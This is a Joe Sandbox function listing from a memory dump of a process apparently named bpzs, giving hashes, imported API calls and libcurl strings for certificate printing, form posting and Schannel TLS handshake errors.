Instruction ID: 2ad3d00da8ff9d6cc9d4c64f4fa60fde3aa6b30688346cedb3d09a80ca912d33
Opcode Fuzzy Hash: abc21618b906d9805955336db46d658a5edf352f7718a27ab725e675ebd82f1c
Instruction Fuzzy Hash: 2641F072A2C61286F764AF19F444635FA91EF0C390F848079D96E826D4CE7CD4486FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D22F8C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1d6c477dbe184f4e76211cb13a4e553b9471ad503ada66801840eaac7c50ac
Instruction ID: e841b9c6a3307f4a10fa9c4a03353a49ea5bbe3a1b56975e49a61ed075f91fbb
Opcode Fuzzy Hash: 9d1d6c477dbe184f4e76211cb13a4e553b9471ad503ada66801840eaac7c50ac
Instruction Fuzzy Hash: A631962190954989E39FAB7C4258A35D192EF49B00F7CC371E05F304E8EF2964CAB6F4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3FCF0 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a135b66182e4c327e92f87767384b0d405adc567cf07872aa01e878b619dd7
Instruction ID: 674aac6896d362a0307da10c9437ba6f15778fcff2cbf094222b1d2f09a77c60
Opcode Fuzzy Hash: 12a135b66182e4c327e92f87767384b0d405adc567cf07872aa01e878b619dd7
Instruction Fuzzy Hash: CFA01122A0A80A80AB008B20E2A0E20A220FBACB08B888030880C0A8208E288002C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D48D54 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae77ad71b40267e2938d4467f5d245f8485260bf8a84f67ded6026e06e31d34
Instruction ID: 3f4468a258861ed1cf05eb384379d16d3d20def8393bfb896baddd6e5a5f91cf
Opcode Fuzzy Hash: 5ae77ad71b40267e2938d4467f5d245f8485260bf8a84f67ded6026e06e31d34
Instruction Fuzzy Hash: AEA00121E0ED06D4EB48ABA0A850570E220BF69342B9800B1D02D514E1AF2DA80AA2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D01DC0 Relevance: 84.0, APIs: 67, Instructions: 248COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01DDB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01DEB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01DF9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E07
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E15
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E23
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E31
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E42
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E56
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E6A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E7E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01E92
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01EA6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01EBA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01ECE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01EE2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01EF6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F32
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F46
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F5A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F6E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F82
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01F96
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01FAA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01FBE

Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E696
Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E6AF

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01FDE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D01FF2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02012
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02020
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0202E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0203B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0206C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02080
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02094
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D020A8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D020BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D020D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D020E4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D020F8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0210C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02120
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02134
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02148
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0215C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02170
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02184
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02198
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D021AC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D021C0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D021D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D021E8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D021FC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02210
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02224
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02238
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0224C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02260
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02274
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02288
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02299
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02329
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0233D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02351
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02365
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02379

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8edadf7d0d03fdc18e7b685ffea5f64f4a5bb0e6177baf17b972b57aec0580a6
Instruction ID: 0e7118913ec846f08d6718cb0717cb98d06e6889e67ba6a438a1f17632692a1f
Opcode Fuzzy Hash: 8edadf7d0d03fdc18e7b685ffea5f64f4a5bb0e6177baf17b972b57aec0580a6
Instruction Fuzzy Hash: 42F1A736649BC19AD74CAF62E5582ACF368FB99B90F480125CF6E43350CF79B0B89354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D4652C Relevance: 54.3, APIs: 13, Strings: 23, Instructions: 345COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D45E00: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D46574), ref: 00007FF7F8D45E41

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D465C3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4661A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46699
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46770
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D467D1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46832
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D468B4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46915
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46967
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46988
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46710

Part of subcall function 00007FF7F8D24654: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F8D464D5), ref: 00007FF7F8D246AC

Part of subcall function 00007FF7F8D24654: __swprintf_l.LIBCMT ref: 00007FF7F8D246CF
Part of subcall function 00007FF7F8D24654: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F8D464D5), ref: 00007FF7F8D24719

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46A65
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46AA7

Strings

Signature Algorithm, xrefs: 00007FF7F8D4673C
Version: %lu (0x%lx), xrefs: 00007FF7F8D466A2
Version, xrefs: 00007FF7F8D46677
Issuer, xrefs: 00007FF7F8D465E6
-----END CERTIFICATE-----, xrefs: 00007FF7F8D46A1C
Public Key Algorithm: %s, xrefs: 00007FF7F8D46876
%2d Subject: %s, xrefs: 00007FF7F8D4659E
Issuer: %s, xrefs: 00007FF7F8D465F8
Expire Date: %s, xrefs: 00007FF7F8D46810
Start Date, xrefs: 00007FF7F8D4679D
Signature: %s, xrefs: 00007FF7F8D468F3
Subject, xrefs: 00007FF7F8D4658C
%lx, xrefs: 00007FF7F8D4665C
Public Key Algorithm, xrefs: 00007FF7F8D46864
Start Date: %s, xrefs: 00007FF7F8D467AF
Signature Algorithm: %s, xrefs: 00007FF7F8D4674E
Expire Date, xrefs: 00007FF7F8D467FE
Cert, xrefs: 00007FF7F8D46A73
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F8D469AB
Serial Number, xrefs: 00007FF7F8D466DC
Serial Number: %s, xrefs: 00007FF7F8D466EE
%s, xrefs: 00007FF7F8D46A85
Signature, xrefs: 00007FF7F8D468E1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc$__swprintf_l
String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$%s$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
API String ID: 158892512-3362715988
Opcode ID: 2285cd0047f939e96d6d7849280c6966e933680fd110ae1c1fdc3068630887e9
Instruction ID: 75057bc295166c11c0d7c9d748390d147f170ff078399ef7697c49257a3252b1
Opcode Fuzzy Hash: 2285cd0047f939e96d6d7849280c6966e933680fd110ae1c1fdc3068630887e9
Instruction Fuzzy Hash: F0E18055A0DA8681FF14EB62B4501F8E760AF4DBC4F880172DD6E17BD6DE2CE109D3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D47C88 Relevance: 52.7, APIs: 13, Strings: 17, Instructions: 238COMMON

Download Yara Rule

APIs

isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47D21
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47D4C
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47D73
islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47D9E
islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47DAC
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47DB9
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47DC7
isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47DD4
isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47DE6
isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47E47
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47E65
isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47E82
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47F2C

Strings

!, xrefs: 00007FF7F8D47F15
\, xrefs: 00007FF7F8D47D3B
], xrefs: 00007FF7F8D47D5A
?, xrefs: 00007FF7F8D47F06
\, xrefs: 00007FF7F8D47F1A
], xrefs: 00007FF7F8D47D0D
-, xrefs: 00007FF7F8D47E1D
], xrefs: 00007FF7F8D47EA7
*, xrefs: 00007FF7F8D47F0B
\, xrefs: 00007FF7F8D47D63
[, xrefs: 00007FF7F8D47EC7
^, xrefs: 00007FF7F8D47F10
[, xrefs: 00007FF7F8D47E3B
[, xrefs: 00007FF7F8D47CFC
], xrefs: 00007FF7F8D47CE1
], xrefs: 00007FF7F8D47F92
\, xrefs: 00007FF7F8D47E51

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isprint$isalnumisdigitislowerisupper
String ID: !$*$-$?$[$[$[$\$\$\$\$]$]$]$]$]$^
API String ID: 1387737040-120579343
Opcode ID: 17f1635dd946962213b61e41078252209e72aa1ab9b9e070464fb598c555fd96
Instruction ID: 732b0db95252e37ebb815874fe982f2dfb8ec12ca8facca21f40b22eb44e9c7e
Opcode Fuzzy Hash: 17f1635dd946962213b61e41078252209e72aa1ab9b9e070464fb598c555fd96
Instruction Fuzzy Hash: FF919521A0D65AC8F7646F2584003B9F7A0AF1C781FCC41B6DA6A462D1CF2DE45CB2B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12DD0 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 165stringwindowCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D12DFC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D12E04
__swprintf_l.LIBCMT ref: 00007FF7F8D131B2
FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F8D131E8
__swprintf_l.LIBCMT ref: 00007FF7F8D13279
__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_I_COMPLETE_AND_CONTINUE, xrefs: 00007FF7F8D132B7
No error, xrefs: 00007FF7F8D132DB
SEC_I_CONTINUE_NEEDED, xrefs: 00007FF7F8D132CF
%s (0x%08X), xrefs: 00007FF7F8D1319D
Unknown error, xrefs: 00007FF7F8D13309
SEC_I_NO_LSA_CONTEXT, xrefs: 00007FF7F8D1331E
SEC_I_SIGNATURE_NEEDED, xrefs: 00007FF7F8D13312
CRYPT_E_REVOKED, xrefs: 00007FF7F8D13196
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 00007FF7F8D1335C
SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 00007FF7F8D13336
SEC_I_COMPLETE_NEEDED, xrefs: 00007FF7F8D132C3
%s - %s, xrefs: 00007FF7F8D1326F
SEC_I_LOCAL_LOGON, xrefs: 00007FF7F8D132AB
SEC_I_RENEGOTIATE, xrefs: 00007FF7F8D1332A
SEC_I_CONTEXT_EXPIRED, xrefs: 00007FF7F8D132E4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpy
String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
API String ID: 13726285-131313631
Opcode ID: 6afefcffaa024906d332abd4884f17e60de1fd345b23f3f9803589e217d855ef
Instruction ID: 9d469ff558f55b527a0c2a45243c1d9106b16e54905cd859cf5a56878a60a91d
Opcode Fuzzy Hash: 6afefcffaa024906d332abd4884f17e60de1fd345b23f3f9803589e217d855ef
Instruction Fuzzy Hash: 16719F21A0CA4295F768BF74A4183B9E251AF8C754FC44136D56E06AD5CF3CE94CE3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D03168 Relevance: 44.1, APIs: 12, Strings: 13, Instructions: 359stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

strchr.LIBVCRUNTIME ref: 00007FF7F8D03202
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D03214

Strings

curl_formadd failed!, xrefs: 00007FF7F8D035A7, 00007FF7F8D036D6
;filename=, xrefs: 00007FF7F8D03365
skip unknown form field: %s, xrefs: 00007FF7F8D034E2
Illegally formatted input field!, xrefs: 00007FF7F8D036F9
%127[^/]/%127[^;,], xrefs: 00007FF7F8D0330F
filename=, xrefs: 00007FF7F8D03478
curl_formadd failed, possibly the file %s is bad!, xrefs: 00007FF7F8D03678
Error building form post!, xrefs: 00007FF7F8D0343F, 00007FF7F8D0351F
;type=, xrefs: 00007FF7F8D035E7
Illegally formatted content-type field!, xrefs: 00007FF7F8D03507
%255[^=]=, xrefs: 00007FF7F8D031E3
out of memory, xrefs: 00007FF7F8D03228
type=, xrefs: 00007FF7F8D032E4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __stdio_common_vsscanf_strdupstrchr
String ID: %127[^/]/%127[^;,]$%255[^=]=$;filename=$;type=$Error building form post!$Illegally formatted content-type field!$Illegally formatted input field!$curl_formadd failed!$curl_formadd failed, possibly the file %s is bad!$filename=$out of memory$skip unknown form field: %s$type=
API String ID: 2016462999-3672787328
Opcode ID: 594b5320d02ba21bb09cfe4467dfdb164a606ba6279798f130d7118cca6e495c
Instruction ID: 6d74f6a0584026557e01d4ebad584346fd7c270a619c287df860bd57172ab69a
Opcode Fuzzy Hash: 594b5320d02ba21bb09cfe4467dfdb164a606ba6279798f130d7118cca6e495c
Instruction Fuzzy Hash: 38F1BD22A0C68286EB15EF25D4403BDE7A0FF89784F840135DA6D476DADF7CE508D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3E268 Relevance: 38.8, APIs: 7, Strings: 15, Instructions: 327networkCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3E35D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3E3C3
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3E40F
recv.WS2_32 ref: 00007FF7F8D3E464
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3E4DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3E5EB
WSAGetLastError.WS2_32 ref: 00007FF7F8D3E72B

Strings

schannel: encrypted data buffer: offset %zu length %zu, xrefs: 00007FF7F8D3E4A7
schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 00007FF7F8D3E762
schannel: unable to re-allocate memory, xrefs: 00007FF7F8D3E416
schannel: next InitializeSecurityContext failed: %s, xrefs: 00007FF7F8D3E7DF
schannel: unable to allocate memory, xrefs: 00007FF7F8D3E36C
schannel: received incomplete message, need more data, xrefs: 00007FF7F8D3E871
schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 00007FF7F8D3E80A
schannel: SSL/TLS handshake complete, xrefs: 00007FF7F8D3E85C
schannel: failed to receive handshake, need more data, xrefs: 00007FF7F8D3E74F
schannel: SNI or certificate check failed: %s, xrefs: 00007FF7F8D3E7CF
schannel: sending next handshake data: sending %lu bytes..., xrefs: 00007FF7F8D3E63B
schannel: encrypted data got %zd, xrefs: 00007FF7F8D3E487
schannel: encrypted data length: %lu, xrefs: 00007FF7F8D3E6D1
schannel: SSL/TLS connection with %s port %hu (step 2/3), xrefs: 00007FF7F8D3E2E9
schannel: a client certificate has been requested, xrefs: 00007FF7F8D3E7B5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc$ErrorLastfreereallocrecv
String ID: schannel: SNI or certificate check failed: %s$schannel: SSL/TLS connection with %s port %hu (step 2/3)$schannel: SSL/TLS handshake complete$schannel: a client certificate has been requested$schannel: encrypted data buffer: offset %zu length %zu$schannel: encrypted data got %zd$schannel: encrypted data length: %lu$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to receive handshake, need more data$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: received incomplete message, need more data$schannel: sending next handshake data: sending %lu bytes...$schannel: unable to allocate memory$schannel: unable to re-allocate memory
API String ID: 3337821324-1753479209
